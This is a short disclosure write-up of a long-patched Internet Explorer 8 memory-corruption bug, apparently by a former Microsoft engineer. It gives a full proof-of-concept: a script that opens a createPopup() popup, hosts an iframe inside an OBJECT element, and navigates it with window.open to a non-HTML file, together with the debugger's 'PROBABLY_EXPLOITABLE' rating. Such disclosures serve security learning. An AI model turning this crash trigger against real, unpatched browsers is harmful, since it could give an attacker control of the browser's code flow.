Loading a non-HTML file (an XML feed, XAML, XPS, SWF, etc.) in an iframe that lives inside an OBJECT element inside a createPopup() popup, and then navigating that iframe via window.open, crashes IE8. The window.open call is specifically what triggers the crash; navigating the same iframe by setting location.href does not trigger it.
<script language="JavaScript">
    // Create a popup (IE-only createPopup API) and place an OBJECT element in it.
    // The OBJECT loads object.html, which in turn hosts the named iframe.
    var cPop = createPopup();
    cPop.document.body.innerHTML =
        '<object id="obj" data="object.html" type="text/html" width="1" height="1"></object>';

    function main()
    {
        // The show/hide cycle is required; without it the crash does not trigger.
        cPop.show(0, 0, 1, 1);
        cPop.hide();
        // Navigate the iframe inside the OBJECT via window.open. Setting
        // location.href instead does not trigger the crash.
        cPop.document.all.obj.object.parentWindow.open("non_html_code.xml", "IFrame_Inside_Object");
    }
</script>
<input type="button" onclick="main();" value="Click here">
The object.html file contains only the iframe that the script above navigates:
<iframe name="IFrame_Inside_Object" src="non_html_code.xml"></iframe>
The show/hide cycle is required: without it the crash does not trigger. The !exploitable WinDbg extension classifies the crash as PROBABLY_EXPLOITABLE, because data from the faulting address controls code flow in mshtml!CWindow::OpenEx+0x256 (hash 0x3b472e2b.0x35505541). Tested on IE8 on Windows 7 and IE8 on Windows XP.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.